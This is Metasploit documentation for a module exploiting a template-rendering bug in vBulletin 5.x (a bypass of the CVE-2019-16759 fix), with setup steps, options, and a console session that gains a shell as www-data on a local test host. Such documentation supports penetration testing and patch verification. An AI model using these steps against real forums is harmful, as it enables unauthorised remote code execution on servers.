adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/documentation/modules/exploit/multi/http/vbulletin_widget_template_rce.md
T

2.2 KiB
Raw Blame History

Vulnerable Application

vBulletin A popular PHP bulletin board and blog web application. This module has been tested successfully against vBulletin 5.6.2 running on Ubuntu Linux 19.04.

Description

This module exploits a logic bug within the template rendering code of vBulletin 5.x. The module uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument which causes the former template to load the latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.

Verification Steps

  1. Do: use exploit/multi/http/vbulletin_widget_template_rce
  2. Do: set RHOSTS [IP]
  3. Do: set VHOST [HOSTNAME]
  4. Do: set LHOST [IP]
  5. Do: set TARGETURI [PATH]
  6. Do: set PAYLOAD [PAYLOADNUM]
  7. Do: run

Options

TARGETURI

The base URI path of vBulletin. Default: /

PHP_CMD

The PHP function to use to execute commands on the target. Default: shell_exec

Scenarios

msf6 > use exploit/multi/http/vbulletin_widget_template_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set VHOST vb.local
VHOST => vb.local
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set PAYLOAD 5
msf6 exploit(multi/http/vbulletin_widget_template_rce) > run

[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending php/bind_perl command payload
[*] Started bind TCP handler against 127.0.0.1:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 127.0.0.1:4444) at 2020-08-09 06:29:57 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reference in New Issue View Git Blame Copy Permalink